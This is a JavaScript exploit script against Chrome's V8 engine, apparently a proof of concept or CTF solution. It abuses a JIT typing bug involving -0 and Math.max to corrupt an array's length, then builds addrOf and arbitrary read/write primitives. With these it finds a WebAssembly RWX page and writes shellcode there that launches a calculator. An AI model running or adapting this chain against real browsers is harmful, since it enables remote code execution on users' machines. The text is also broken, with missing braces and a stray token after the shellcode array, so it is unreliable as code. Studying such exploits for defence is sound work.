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class Helpers {
constructor() {
this.cvt_buf = new ArrayBuffer(8);
this.cvt_f64a = new Float64Array(this.cvt_buf);
this.cvt_u64a = new BigUint64Array(this.cvt_buf);
this.cvt_u32a = new Uint32Array(this.cvt_buf);
ftoi(f) {
this.cvt_f64a[0] = f;
return this.cvt_u64a[0];
itof(i) {
this.cvt_u64a[0] = i;
return this.cvt_f64a[0];
ftoil(f) {
this.cvt_f64a[0] = f;
return this.cvt_u32a[0];
ftoih(f) {
this.cvt_f64a[0] = f;
return this.cvt_u32a[1];
fsetil(f, l) {
this.cvt_f64a[0] = f;
this.cvt_u32a[0] = l;
return this.cvt_f64a[0];
fsetih(f, h) {
this.cvt_f64a[0] = f;
this.cvt_u32a[1] = h;
return this.cvt_f64a[0];
isetltof(i, l) {
this.cvt_u64a[0] = i;
this.cvt_u32a[0] = l;
return this.cvt_f64a[0];
isethtof(i, h) {
this.cvt_u64a[0] = i;
this.cvt_u32a[1] = h;
return this.cvt_f64a[0];
igetl(i) {
this.cvt_u64a[0] = i;
return this.cvt_u32a[0];
igeth(i) {
this.cvt_u64a[0] = i;
return this.cvt_u32a[1];
gc() { for(let i = 0; i < 100; i++) { new ArrayBuffer(0x1000000); } }
printhex( s, val ) { alert(s + '0x' + val.toString(16)); }
function trigger(a) {
let minusZero = -0;
var p = -0x80000000;
if ( a ) {
minusZero = -1;
p = 1;
p = minusZero - p;
p = p + 0;
p = Math.max(-4, p);
p = -p;
p += 1;
p = Math.max(p, 1);
p += 1;
p >>= 1;
p -= 2;
let arr = Array(p);
let arr_two = [1.1,2.2,3.3];
return [p, arr, arr_two];
function pwn() {
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
let helper = new Helpers();
var buf = new ArrayBuffer(0x100);
var dataview = new DataView(buf);
for (let i = 0; i < 0x10000; i++) { trigger(true); }
let a = trigger(false);
let o = a[1];
let corrupted_arr = a[2];
let object_arr = [corrupted_arr, {}];
let simple_arr = [1.1,2.2,3.3,4.4,5.5];
o[16] = 0x4141;
var double_arr_map = helper.ftoi(corrupted_arr[3]) & 0xffffffffn;
var object_arr_map = helper.ftoi(corrupted_arr[7]) >> 32n;
helper.printhex("Double array map: ", double_arr_map);
helper.printhex("Object array map: ", object_arr_map);
function addrOf(object) {
object_arr[0] = object;
return helper.ftoi(corrupted_arr[15]) >> 32n;
var w_instance = addrOf(wasm_instance);
helper.printhex("WASM : ",w_instance);
function arbRead( where ) {
corrupted_arr[28] = helper.itof( (6n << 32n) + where );
return helper.ftoi(simple_arr[0]);
var RWX_PAGE = arbRead( w_instance + 0x60n );
helper.printhex("RWX: ",RWX_PAGE);
function arbWrite( where, what ) {
corrupted_arr[28] = helper.itof( (6n << 32n) + where );
simple_arr[0] = helper.itof(what);
var buf_addr = addrOf(buf);
var backing_store = buf_addr + 0xcn;
var shellcode = [0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];01
arbWrite( backing_store, RWX_PAGE);
for(var i = 0; i < shellcode.length; i++) {
dataview.setUint32(4 * i, shellcode[i], true);
/* References
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